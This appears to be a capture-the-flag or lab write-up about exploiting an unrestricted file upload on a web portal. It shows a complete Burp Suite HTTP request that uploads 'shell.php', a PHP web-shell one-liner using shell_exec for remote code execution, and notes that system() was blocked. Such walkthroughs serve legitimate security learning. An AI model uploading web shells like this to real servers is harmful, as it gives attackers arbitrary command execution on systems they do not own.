Skip to main content

Unrestricted File Upload

As Paul, we have access to a file upload service to supposedly upload only zip files.

File upload

Of course, from the source code, we can obviously see that there are no upload restrictions at all. (Not even file type or file name)

Moreover, we control the file name to be uploaded in the task field. Using Burp Suite, we can send a PHP one liner to allow for remote code execution.

Upload malicious files

POST /portal/includes/fileController.php HTTP/1.1
Content-Length: 338
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHBZNum5szzVSddPn
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: PHPSESSID=paul47200b180ccd6835d25d034eeb6e6390; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjp7InVzZXJuYW1lIjoicGF1bCJ9fQ.7pc5S1P76YsrWhi_gu23bzYLYWxqORkr0WtEz_IUtCU
Connection: close

Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: application/x-httpd-php

<?php echo shell_exec($_GET['cmd']); ?>

Content-Disposition: form-data; name="task"



While I first tried to use the PHP system command, there seems to be an error when performing the upload. I suspect that system is not allowed by the PHP configuration.

Changing to shell_exec solves the issue.